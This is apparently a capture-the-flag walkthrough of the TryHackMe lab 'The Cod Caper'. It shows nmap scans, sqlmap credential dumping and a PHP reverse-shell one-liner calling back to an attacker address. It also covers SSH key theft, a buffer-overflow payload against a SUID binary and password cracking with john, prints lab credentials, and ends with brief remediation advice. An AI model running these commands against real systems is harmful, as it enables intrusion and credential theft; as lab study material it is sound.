Page cover

[Linux] The Cod Caper

Reconnaissance

sudo nmap 10.10.108.37
sudo nmap -A -p 22,80 10.10.108.37
sudo nmap --script vuln -p 22,80 10.10.108.37

Enumeration

We got a login page at /administrator.php.

We performed some automated SQL injection attacks on this form.

sqlmap -u http://10.10.108.37/administrator.php --forms --dump

We obtained some credentials.

+------------+----------+
| password   | username |
+------------+----------+
| secretpass | pingudad |
+------------+----------+

We are able to run some commands, which we can use to obtain a reverse shell.

Exploitation

php -r '$sock=fsockopen("10.10.209.239",4242);exec("/bin/sh -i <&3 >&3 2>&3");'

We found a hidden file on the machine, and its content is pinguapingu.

Lateralisation

There are two users: papa and pingu. We can export pingu's SSH private key, which will allow us to maintain persistence on the pingu account.

Privilege escalation

A suspicious file has the SUID bit set. We can download it for further analysis.

chmod 600 id_rsa
scp -i id_rsa pingu@10.10.108.37:/opt/secret/root .

The private key is protected with a passphrase. We used the password we found in /var/hidden/pass, and it worked.

The file is an executable. We can analyze it with Ghidra, which allows us to examine the execution flow of the executable.

The main function calls the scanf function, which is vulnerable to a buffer overflow. We need to determine what we can exploit with this information. Additionally, we found a function called shell, which accesses a file that could contain sensitive information.

We used PwnGDB to:

  1. Determine the length needed to cause a segmentation fault.

  2. Find the address of the shell function.

  3. Run the script below.

python -c 'print "A"*44 + "\xcb\x84\x04\x08"' | /opt/secret/root
john -w=/usr/share/wordlists/rockyou.txt root_hash_pwd 
john -w=/usr/share/wordlists/rockyou.txt papa_hash_pwd

Creditials:

  • papa:postman

  • root:lov2fish

Remediation

  • Use strong passwords.

  • Avoid exposing dangerous services online, such as web shells.

  • Refrain from using vulnerable functions like scanf.

  • Compile C programs with buffer overflow protections.

PreviousTryHackmeNext[Linux] Start Up

Last updated